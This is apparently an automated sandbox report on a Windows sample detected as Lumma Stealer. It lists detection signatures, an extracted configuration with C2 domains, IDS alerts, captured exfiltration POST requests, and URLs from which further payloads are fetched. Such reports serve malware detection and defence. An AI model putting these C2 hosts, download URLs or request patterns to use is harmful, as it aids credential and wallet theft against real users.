Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FBmz85HS0d.exe

Overview

General Information

Sample name:FBmz85HS0d.exe
renamed because original name is a hash value
Original sample name:30669d81a7fc7b2867ecc452ce55d1d9.exe
Analysis ID:1579799
MD5:30669d81a7fc7b2867ecc452ce55d1d9
SHA1:56ca44ab9cc26864bf86a41f82431239baf994a8
SHA256:dad97310b0e1e3b946976f14c39d47bbb7140c31e79597abcd6159c2a4f02c32
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FBmz85HS0d.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\FBmz85HS0d.exe" MD5: 30669D81A7FC7B2867ECC452CE55D1D9)
    • WerFault.exe (PID: 4236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cuddlyready.xyz", "sendypaster.xyz", "greywe-snotty.cyou", "hosue-billowy.cyou", "supporse-comment.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "smash-boiling.cyou", "steppriflej.xyz"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: FBmz85HS0d.exe PID: 7312JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 4 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:23:29.389976+010020283713Unknown Traffic192.168.2.749699172.67.150.173443TCP
                2024-12-23T09:23:31.540071+010020283713Unknown Traffic192.168.2.749700172.67.150.173443TCP
                2024-12-23T09:23:34.252674+010020283713Unknown Traffic192.168.2.749701172.67.150.173443TCP
                2024-12-23T09:23:36.552506+010020283713Unknown Traffic192.168.2.749703172.67.150.173443TCP
                2024-12-23T09:23:38.917767+010020283713Unknown Traffic192.168.2.749709172.67.150.173443TCP
                2024-12-23T09:23:41.665068+010020283713Unknown Traffic192.168.2.749716172.67.150.173443TCP
                2024-12-23T09:23:44.347063+010020283713Unknown Traffic192.168.2.749723172.67.150.173443TCP
                2024-12-23T09:23:49.240072+010020283713Unknown Traffic192.168.2.749740172.67.150.173443TCP
                2024-12-23T09:23:51.519479+010020283713Unknown Traffic192.168.2.749746185.166.143.50443TCP
                2024-12-23T09:23:54.015497+010020283713Unknown Traffic192.168.2.7497523.5.25.82443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:23:30.182312+010020546531A Network Trojan was detected192.168.2.749699172.67.150.173443TCP
                2024-12-23T09:23:32.310553+010020546531A Network Trojan was detected192.168.2.749700172.67.150.173443TCP
                2024-12-23T09:23:49.985216+010020546531A Network Trojan was detected192.168.2.749740172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:23:30.182312+010020498361A Network Trojan was detected192.168.2.749699172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:23:32.310553+010020498121A Network Trojan was detected192.168.2.749700172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T09:23:42.427857+010020480941Malware Command and Control Activity Detected192.168.2.749716172.67.150.173443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: FBmz85HS0d.exeAvira: detected
                Source: FBmz85HS0d.exe.7312.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cuddlyready.xyz", "sendypaster.xyz", "greywe-snotty.cyou", "hosue-billowy.cyou", "supporse-comment.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "smash-boiling.cyou", "steppriflej.xyz"], "Build id": "LOGS11--LiveTraffic"}
                Source: FBmz85HS0d.exeReversingLabs: Detection: 60%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: FBmz85HS0d.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: pollution-raker.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: hosue-billowy.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: ripe-blade.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: smash-boiling.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: supporse-comment.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: greywe-snotty.cyou
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: steppriflej.xyz
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sendypaster.xyz
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cuddlyready.xyz
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: FBmz85HS0d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.25.82:443 -> 192.168.2.7:49752 version: TLS 1.2
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49716 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49740 -> 172.67.150.173:443
                Source: Malware configuration extractorURLs: cuddlyready.xyz
                Source: Malware configuration extractorURLs: sendypaster.xyz
                Source: Malware configuration extractorURLs: greywe-snotty.cyou
                Source: Malware configuration extractorURLs: hosue-billowy.cyou
                Source: Malware configuration extractorURLs: supporse-comment.cyou
                Source: Malware configuration extractorURLs: pollution-raker.cyou
                Source: Malware configuration extractorURLs: ripe-blade.cyou
                Source: Malware configuration extractorURLs: smash-boiling.cyou
                Source: Malware configuration extractorURLs: steppriflej.xyz
                Source: DNS query: cuddlyready.xyz
                Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
                Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
                Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49740 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 3.5.25.82:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 185.166.143.50:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6QLOBSPXZT92PZ4HKWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12850Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OIEL5BSFKMMBH6WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15064Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z8U6FMPNN7YKQ3BQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6GN8K2WS2O3290JLUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0Q7VO4LRXIG1CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552437Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exentmj
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482458559.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446552557.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: FBmz85HS0d.exe, 00000000.00000003.1553814190.0000000005925000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553777662.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1557542576.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877911381.0000000006039000.00000002.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553935100.00000000058F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
